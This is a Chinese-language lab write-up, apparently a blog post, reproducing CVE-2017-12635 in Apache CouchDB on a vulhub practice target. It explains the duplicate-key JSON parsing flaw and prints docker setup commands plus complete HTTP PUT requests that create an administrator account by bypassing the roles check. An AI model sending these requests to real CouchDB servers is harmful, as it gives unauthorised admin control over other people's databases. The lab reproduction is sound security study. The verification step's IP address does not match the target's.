-
- 漏洞名称:
-
- 影响版本
-
漏洞原理
-
漏洞复现
-
- 环境准备
-
漏洞利用
-
验证漏洞利用是否成功
-
修复建议
简介:
Apache CouchDB是一个开源的NoSQL数据库,专注于易用性和成为“完全拥抱web的数据库”。它是一个使用JSON作为数据存储格式,javascript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。
在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。
影响版本
小于 1.7.0 以及 小于 2.1.1
漏洞原理
CVE-2017-12635:Erlang和JavaScript,对JSON解析方式的不同,导致语句执行产生差异性。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。
举例:
Erlang:
jiffy:decode(“{“a”:“1”, “a”:“2”}”).
{[{<<“a”>>,<<“1”>>},{<<“a”>>,<<“2”>>}]}
JavaScript:
JSON.parse(“{“a”:”“, “a”: “”}”)
{a: “”}
在定义一对键值对时,Eralang解析器将存储两个值;javascript只存储第二个值。但jiffy实现时,getter函数只返回第一个值。这里涉及的函数参考:
https://www.anquanke.com/post/id/87256
https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635
环境准备
靶机环境 139.196.87.102 (vulhub)
攻击机环境 192.168.8.137 (虚拟机 Ubuntu 20、Java1.8、Burp)
启动 Couchdb 垂直权限绕过漏洞 环境
1.进入 vulhub 的 Couchdb 垂直权限绕过漏洞 路径
cd /usr/local/tools/vulhub//couchdb/CVE-2017-12635
2.编译并启动环境
docker-compose up -d
3.查看环境运行状态
docker ps | grep vulhub
环境启动后,访问http://139.196.87.102:5984/_utils/即可看到一个web页面,说明Couchdb已成功启动。但我们不知道密码,无法登陆。
漏洞利用
首先,发送如下数据包至: 139.196.87.102:5984
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 139.196.87.102:5984
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 110
{
“type”: “user”,
“name”: “vulhub”,
“roles”: [“_admin”],
“roles”:[],
“password”: “vulhub111”
}
返回403错误,提示 {“error”:“forbidden”,“reason”:“Only _admin may set roles”},只有管理员才能设置Role角色
这个时候,我们利用 Erlang和JavaScript 处理 JSON 的特性,发送包含两个roles的数据包,即可绕过限制:
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 139.196.87.102:5984
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108
{
“type”: “user”,
“name”: “vulhub”,
“roles”: [“_admin”],
“roles”: [],
“password”: “vulhub”
}
验证漏洞利用是否成功
再次访问 http://192.168.183.134:5984/_utils/,输入账户密码vulhub,可以成功登录
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
